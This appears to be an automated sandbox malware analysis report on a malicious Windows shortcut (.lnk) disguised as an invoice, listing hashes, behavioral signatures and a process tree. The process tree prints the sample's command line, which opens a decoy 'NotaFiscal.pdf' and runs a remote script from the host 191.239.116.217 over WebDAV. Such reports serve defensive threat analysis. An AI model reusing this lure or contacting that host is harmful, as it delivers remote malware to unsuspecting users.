Analysis
- max time kernel: 118s
- max time network: 118s
- platform: windows7_x64
- resource: win7-20240220-en
- resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
- submitted: 14-04-2024 01:36
Static task: static1

Behavioral task: behavioral1
- Sample: a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk
- Resource: win7-20240220-en

Behavioral task: behavioral2
- Sample: a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk
- Resource: win10v2004-20240226-en
General
- Target: a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk
- Size: 3KB
- MD5: cd4f87e63be918ec6ef8d39082669834
- SHA1: 77a144bb45fff156050324b8318741bcae27d9f8
- SHA256: a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef
- SHA512: 877e9c3d0157db9c73729f94155cf6481257d6f64dbe564678cc1e35f471b20434fa27ef901b3c1b103fd4d6b715e906fe641faba6c3e9709caf05175de0e1c2
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes:
    pid   process
    2528  AcroRd32.exe

- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  Processes:
    pid   process
    2528  AcroRd32.exe

- Suspicious use of SetWindowsHookEx (2 IoCs)
  Processes:
    pid   process
    2528  AcroRd32.exe
    2528  AcroRd32.exe

- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes:
    description                        pid   process   target process
    PID 2908 wrote to memory of 2400   2908  cmd.exe   cmd.exe
    PID 2908 wrote to memory of 2400   2908  cmd.exe   cmd.exe
    PID 2908 wrote to memory of 2400   2908  cmd.exe   cmd.exe
    PID 2400 wrote to memory of 2528   2400  cmd.exe   AcroRd32.exe
    PID 2400 wrote to memory of 2528   2400  cmd.exe   AcroRd32.exe
    PID 2400 wrote to memory of 2528   2400  cmd.exe   AcroRd32.exe
    PID 2400 wrote to memory of 2528   2400  cmd.exe   AcroRd32.exe
    PID 2400 wrote to memory of 2564   2400  cmd.exe   cmd.exe
    PID 2400 wrote to memory of 2564   2400  cmd.exe   cmd.exe
    PID 2400 wrote to memory of 2564   2400  cmd.exe   cmd.exe
Processes (process tree; indentation shows parent/child depth)
- C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\a6d995d015c16985b456bcc5cd44377c3e5e5cf72b17771eadc51e1d02a3c6ef.lnk
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /min /c "echo Visualizacao indisponivel > C:\Users\Admin\downloads\NotaFiscal.pdf & start C:\Users\Admin\downloads\NotaFiscal.pdf & start /min cmd.exe /c "\\191.239.116.217@80\Documentos\files\a3.cmd""
    - Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
      Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SetWindowsHookEx
    - C:\Windows\system32\cmd.exe
      Command line: cmd.exe /c "\\191.239.116.217@80\Documentos\files\a3.cmd"
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
  Filesize: 3KB
  MD5: f09b63daf6df766e54d259b4caa62af3
  SHA1: 8f95932effe7cde26cac535d684dedfae4002655
  SHA256: 7350eedd926ce61e5068d150beac2d5da3d030481b65422ddaf9d0281c95b38a
  SHA512: 820c8a57b6f7d7d1466aa91f6bbc223c40e4e95676625dbe059a94ababb88a1c236c24f9c398cd442ab31418803d4ba13ef50bc35ebacaa2a7e1c9c46d02dabf

- C:\Users\Admin\Downloads\NotaFiscal.pdf
  Filesize: 29B
  MD5: 823a9caa296579d6a40cd5195d969727
  SHA1: 5592813787ecff9133229439498d624339c07ece
  SHA256: 60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e
  SHA512: 77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc